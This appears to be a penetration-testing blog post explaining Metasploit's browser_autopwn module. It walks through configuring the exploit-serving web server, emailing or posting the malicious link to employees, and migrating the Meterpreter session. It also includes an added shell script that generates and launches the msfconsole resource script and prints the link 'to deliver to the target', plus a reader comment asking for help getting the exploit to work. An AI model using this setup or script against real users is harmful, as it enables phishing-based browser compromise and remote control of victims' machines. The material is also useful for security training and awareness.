Nowadays, firewall restrictions and patch management policies have made direct exploitation of systems much more difficult. One of the most efficient alternatives is the client-side attack. Client-side attacks require user interaction and in most cases are delivered through social engineering engagements. An employee who lacks the knowledge to understand the risks of opening untrusted links can help an attacker compromise internal systems. The fact that browsers are often patched less promptly than operating systems makes the problem bigger.

In this article we will examine the effectiveness of the Metasploit browser_autopwn module. The basic idea behind this module is that it starts a web server on our local machine that hosts a number of browser exploits. When the user opens the malicious link, the server fingerprints the visiting browser with JavaScript and launches the exploits that match it; if one of them succeeds, a Meterpreter session is opened.

To use this attack we open the Metasploit framework (msfconsole) and select the browser_autopwn module. The next image shows the available options and default settings for this module.

Options of browser autopwn module

We set LHOST to our IP address, SRVPORT to 80 (otherwise the link we send to the user must have the form IP:8080, since 8080 is the module's default port) and URIPATH to / so that Metasploit does not generate a random URL.

Configuring the Browser Autopwn

 

When the module runs we see exploits for a variety of browsers being loaded into our web server.

Loading the browser exploits

 

Now we can send the link by email to the client's employees. If a user opens the malicious link, the autopwn module tries the exploits that apply to that browser to see if it can break into the client. If the browser is vulnerable to any of them, a Meterpreter session is opened.

Meterpreter sessions opened with Browser Autopwn
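The configuration described above, collected into a Metasploit resource script so the same setup can be repeated on every engagement. This is an added example and not code from the original post: the attacker address 192.168.1.2 is an assumption, the script is written under /tmp, and msfconsole is only launched when the RUN_MSF environment variable is set to 1 so the generated commands can be reviewed without starting the framework. The module path auxiliary/server/browser_autopwn is the one the post refers to; later Metasploit releases replaced it with auxiliary/server/browser_autopwn2.

```shell
#!/bin/sh
# Added example, not part of the original post.
# Builds a msfconsole resource script for browser_autopwn with the settings
# discussed above and shows the link that has to reach the target.
set -eu

# write_autopwn_rc LHOST SRVPORT URIPATH OUTFILE
# Writes the msfconsole commands to OUTFILE and echoes its path.
write_autopwn_rc() {
    lhost=$1
    srvport=$2
    uripath=$3
    out=$4
    cat > "$out" <<EOF
use auxiliary/server/browser_autopwn
set LHOST $lhost
set SRVPORT $srvport
set URIPATH $uripath
run
EOF
    printf '%s\n' "$out"
}

# autopwn_link LHOST SRVPORT URIPATH
# The URL the victim must open. On port 80 the port can be left out of the
# link, which is why the post sets SRVPORT to 80 instead of the default 8080.
autopwn_link() {
    lhost=$1
    srvport=$2
    uripath=$3
    if [ "$srvport" = 80 ]; then
        printf 'http://%s%s\n' "$lhost" "$uripath"
    else
        printf 'http://%s:%s%s\n' "$lhost" "$srvport" "$uripath"
    fi
}

# Assumption: 192.168.1.2 is the attacker's address on the client network.
LHOST=${LHOST:-192.168.1.2}
RC=$(write_autopwn_rc "$LHOST" 80 / "${TMPDIR:-/tmp}/browser_autopwn.rc")

echo "Resource script written to $RC:"
cat "$RC"
echo "Send this link to the target: $(autopwn_link "$LHOST" 80 /)"

# Launch only on request; binding port 80 requires root privileges.
if [ "${RUN_MSF:-0}" = 1 ]; then
    msfconsole -q -r "$RC"
fi
```

Run it once to inspect the generated script, then `RUN_MSF=1 sudo -E sh autopwn.sh` to start the listener; the link printed at the end is the one to deliver to the target.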

 

Browser-based attacks are not stable: the exploited browser can crash, which means the Meterpreter session or shell access is lost. For that reason Metasploit tries to migrate the payload into another, more stable process as soon as possible.

Migrate to another process

 

Conclusion

Most organizations sit behind proxy firewalls that only allow outbound port 80, which is exactly the port this module has been configured to listen on. At the same time, many employees use social networks for various reasons. An attacker can exploit that and send malicious links to users through social networks, so this attack can be very effective against companies: it carries exploits for most popular browsers and requires only one person's mistake in order to succeed. The Metasploit browser_autopwn module is proof of how dangerous it is to open links that come from untrusted sources.

4 Comments

  1. Pingback: Wifi-leaks Deel 1
  2. I tried using the exploit, but when I open the URL on the victim PC (a VM instance of Windows XP SP1), in my msfconsole I get the message "handling request from 192.168.1.3" (the IP of the XP machine) and nothing happens.
    Please help.
